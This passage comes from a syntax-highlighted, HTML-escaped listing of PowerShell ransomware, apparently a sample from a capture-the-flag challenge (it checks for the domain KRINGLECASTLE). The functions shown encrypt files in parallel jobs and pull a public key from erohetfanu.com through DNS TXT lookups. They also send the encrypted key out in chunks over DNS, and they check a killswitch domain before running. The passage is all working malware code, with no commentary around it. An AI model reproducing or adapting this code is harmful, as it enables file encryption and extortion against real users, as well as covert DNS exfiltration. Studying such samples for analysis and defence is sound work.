        &lt;span class="nv"&gt;$SrcData&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Close&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="no"&gt;[byte[]]&lt;/span&gt; &lt;span class="nv"&gt;$byteArr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ToArray&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$byteArr&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;sh1&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[String]&lt;/span&gt; &lt;span class="nv"&gt;$String&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$SB&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;StringBuilder&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="no"&gt;[System.Security.Cryptography.HashAlgorithm]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;SHA1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;ComputeHash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[System.Text.Encoding]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;UTF8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$String&lt;/span&gt;&lt;span class="p"&gt;))|%{&lt;/span&gt;
        &lt;span class="no"&gt;[Void]&lt;/span&gt;&lt;span class="nv"&gt;$SB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ToString&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;x2&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="nv"&gt;$SB&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ToString&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;p_k_e&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key_bytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;[byte[]]&lt;/span&gt;&lt;span class="nv"&gt;$pub_bytes&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
    &lt;span class="nv"&gt;$cert&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;-TypeName&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Security&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Cryptography&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;X509Certificates&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;X509Certificate2&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="nv"&gt;$cert&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Import&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$pub_bytes&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$encKey&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$cert&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PublicKey&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key_bytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="nv"&gt;$encKey&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;e_n_d&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$allfiles&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$make_cookie&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$tcount&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;12&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;-lt&lt;/span&gt; &lt;span class="nv"&gt;$allfiles&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;++&lt;/span&gt;  &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$running&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;&lt;span class="nb"&gt;Get-Job&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Where-Object&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;State&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Running&amp;#39;&lt;/span&gt;
                    &lt;span class="p"&gt;});&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$running&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Count&lt;/span&gt; &lt;span class="o"&gt;-le&lt;/span&gt; &lt;span class="nv"&gt;$tcount&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nb"&gt;Start-Job&lt;/span&gt;  &lt;span class="n"&gt;-ScriptBlock&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                    &lt;span class="k"&gt;param&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$File&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$true_false&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="n"&gt;e_d_file&lt;/span&gt; &lt;span class="nv"&gt;$key&lt;/span&gt; &lt;span class="nv"&gt;$File&lt;/span&gt; &lt;span class="nv"&gt;$true_false&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Exception&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Message&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-String&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Out-File&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nv"&gt;$env:userprofile&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;\Desktop\ps_log.txt&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;-append&lt;/span&gt;
                    &lt;span class="p"&gt;}&lt;/span&gt;
                &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;-args&lt;/span&gt; &lt;span class="nv"&gt;$key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$allfiles&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nv"&gt;$make_cookie&lt;/span&gt; &lt;span class="n"&gt;-InitializationScript&lt;/span&gt; &lt;span class="nv"&gt;$functions&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nb"&gt;Start-Sleep&lt;/span&gt; &lt;span class="n"&gt;-m&lt;/span&gt; &lt;span class="n"&gt;200&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;continue&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;g_o_dns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$f&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$h&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;..(&lt;/span&gt;&lt;span class="no"&gt;[convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ToInt32&lt;/span&gt;&lt;span class="p"&gt;($(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$f.erohetfanu.com&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;10&lt;/span&gt;&lt;span class="p"&gt;)-&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$h&lt;/span&gt; &lt;span class="p"&gt;+=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$i.$f.erohetfanu.com&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;H2A&lt;/span&gt; &lt;span class="nv"&gt;$h&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;s_2_c&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$astring&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$size&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$new_arr&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@();&lt;/span&gt;
    &lt;span class="nv"&gt;$chunk_index&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;foreach&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;..$(&lt;/span&gt;&lt;span class="nv"&gt;$astring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt; &lt;span class="nv"&gt;$size&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$new_arr&lt;/span&gt; &lt;span class="p"&gt;+=&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;&lt;span class="nv"&gt;$astring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;substring&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$chunk_index&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nv"&gt;$size&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="nv"&gt;$chunk_index&lt;/span&gt; &lt;span class="p"&gt;+=&lt;/span&gt; &lt;span class="nv"&gt;$size&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$new_arr&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;snd_k&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$enc_k&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$chunks&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s_2_c&lt;/span&gt; &lt;span class="nv"&gt;$enc_k&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$j&lt;/span&gt; &lt;span class="k"&gt;in&lt;/span&gt; &lt;span class="nv"&gt;$chunks&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$chunks&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;IndexOf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$j&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$n_c_id&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$j.6B6579666F72626F746964.erohetfanu.com&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$n_c_id.$j.6B6579666F72626F746964.erohetfanu.com&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$n_c_id&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;wanc&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$S1&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;1f8b080000000000040093e76762129765e2e1e6640f6361e7e202000cdd5c5c10000000&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$null&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2A&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;ti_rox&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;G2B&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;H2B&lt;/span&gt; &lt;span class="nv"&gt;$S1&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;Resolve-DnsName&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="n"&gt;6B696C6C737769746368&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;erohetfanu&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-Type&lt;/span&gt; &lt;span class="n"&gt;TXT&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Strings&lt;/span&gt;&lt;span class="p"&gt;))).&lt;/span&gt;&lt;span class="n"&gt;ToString&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="n"&gt;-ErrorAction&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt; &lt;span class="n"&gt;-Server&lt;/span&gt; &lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;8&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;($(&lt;/span&gt;&lt;span class="n"&gt;netstat&lt;/span&gt; &lt;span class="n"&gt;-ano&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Select-String&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;127.0.0.1:8080&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt; &lt;span class="o"&gt;-or&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;Get-WmiObject&lt;/span&gt; &lt;span class="n"&gt;Win32_ComputerSystem&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;KRINGLECASTLE&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="nv"&gt;$p_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.Convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;($(&lt;/span&gt;&lt;span class="n"&gt;g_o_dns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7365727665722E637274&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$b_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[System.Text.Encoding]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Unicode&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GetBytes&lt;/span&gt;&lt;span class="p"&gt;($((&lt;/span&gt;&lt;span class="no"&gt;[char[]]&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[char]01..[char]&lt;/span&gt;&lt;span class="n"&gt;255&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[char[]]&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="no"&gt;[char]01..[char]&lt;/span&gt;&lt;span class="n"&gt;255&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;+&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;..&lt;/span&gt;&lt;span class="n"&gt;9&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;sort &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
                        &lt;span class="nb"&gt;Get-Random&lt;/span&gt;
                        &lt;span class="p"&gt;})[&lt;/span&gt;&lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;..&lt;/span&gt;&lt;span class="n"&gt;15&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="n"&gt;-join&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;  &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nv"&gt;$_&lt;/span&gt; &lt;span class="o"&gt;-ne&lt;/span&gt; &lt;span class="n"&gt;0x00&lt;/span&gt;
            &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="nv"&gt;$h_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="nv"&gt;$b_k&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$k_h&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="n"&gt;sh1&lt;/span&gt; &lt;span class="nv"&gt;$h_k&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="nv"&gt;$p_k_e_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p_k_e&lt;/span&gt; &lt;span class="nv"&gt;$b_k&lt;/span&gt; &lt;span class="nv"&gt;$p_k&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="n"&gt;ToString&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
